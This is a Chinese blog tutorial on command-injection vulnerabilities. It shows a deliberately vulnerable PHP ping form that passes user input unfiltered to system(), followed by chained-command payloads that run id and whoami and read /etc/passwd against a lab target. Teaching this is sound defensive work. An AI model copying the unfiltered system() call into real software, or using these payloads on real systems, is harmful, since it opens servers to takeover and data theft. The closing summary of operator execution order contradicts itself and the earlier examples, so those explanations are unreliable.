我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!!
一、命令执行漏洞与测试
1、漏洞概念
在部分WEB应用里,应用程序会提供一些命令执行操作,如没有过滤好用户输入的数据,就有可能产生命令执行漏洞 从而执行有危害系统命令。
2、漏洞测试
(1)php源码
<html>
<head>
<meta charset="UTF-8"/>
<title>命令执行</title>
</head>
<body>
<form method='post'>
请输入你的ping的ip:<br />
<input type='text' name='ip' />
<input type='submit' value='提交' />
</form>
</body>
<?php
if($_POST['ip']){
echo system('ping '.$_POST['ip']);
}
?>
</html>
(2)ping命令
(3)命令连接符
(3)测试示例
【靶机链接】【http://www.webtester.com/exec/exec01.php】
payload-1:127.0.0.1 -c 3 & id
payload-2:127.0.0.1 -c 3 && whoami
payload-3:127.0.0.1 -c 3 | cat /etc/passwd
payload-4:127.0.0.1 -c 3 || uname -a
(4)payload总结
1.ping 127.0.0.1 -c 3 & id
//先执行id,后执行ping
2.ping 127.0.0.1 -c 3 && whoami
//先执行ping,后执行whoami
3.ping 127.0.0.1 -c 3 | cat /etc/passwd
//只执行cat
4.ping 127.0.0.1 -c 3 || uname -a
//只执行ping
5.对于逻辑与:执行顺序是一后二前
6.对于逻辑或:执行的是一后二前
本文为互联网自动采集或经作者授权后发布,本文观点不代表立场,若侵权下架请联系我们删帖处理!文章出自:https://blog.csdn.net/qq_45555226/article/details/122769994